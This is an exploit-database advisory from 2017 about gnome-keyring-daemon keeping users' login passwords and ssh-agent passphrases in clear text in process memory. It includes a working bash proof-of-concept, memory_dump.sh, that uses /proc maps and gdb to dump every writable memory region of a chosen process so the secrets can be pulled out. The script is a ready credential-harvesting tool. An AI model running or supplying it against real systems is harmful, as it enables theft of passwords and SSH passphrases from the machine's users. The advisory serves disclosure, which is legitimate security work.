Gnome Keyring Daemon Credential Disclosure



EKU-ID: 6542 CVE: OSVDB-ID:
Author: Luca Ercoli Published: 2017-04-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


gnome-keyring-daemon is vulnerable to local credentials disclosure.


Fortunately the attack can be spun on already compromised machines,
but sadly, in those cases, an attacker can leaverage on
gnome-keyring-daemon to obtain sensible data. 

The application store
password of logged users in clear text in the process memory, hence
expose this information (such of login password, passphrase of
ssh-agent, etc.) to an attacker. 

In this scenario, he can read those
data instantly without cracking it or install keylogger, sniffer and
variuos tools, but using gnome-keyring-daemon in order to obtain this
informations, that can be extracted from memory using a debugger (such
of "gdb"). 

At this URL, there is a script (named "memory_dump.sh")
that can be used as PoC: 

http://www.lucaercoli.it/ 
 
memory_dump.sh:

#!/bin/bash

mkdir $1
cd $1
grep rw-p /proc/$1/maps  \
| awk '{print $1}' \
| sed 's/-/ /' \
| while read mem_start mem_end; do gdb --pid $1 --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"; done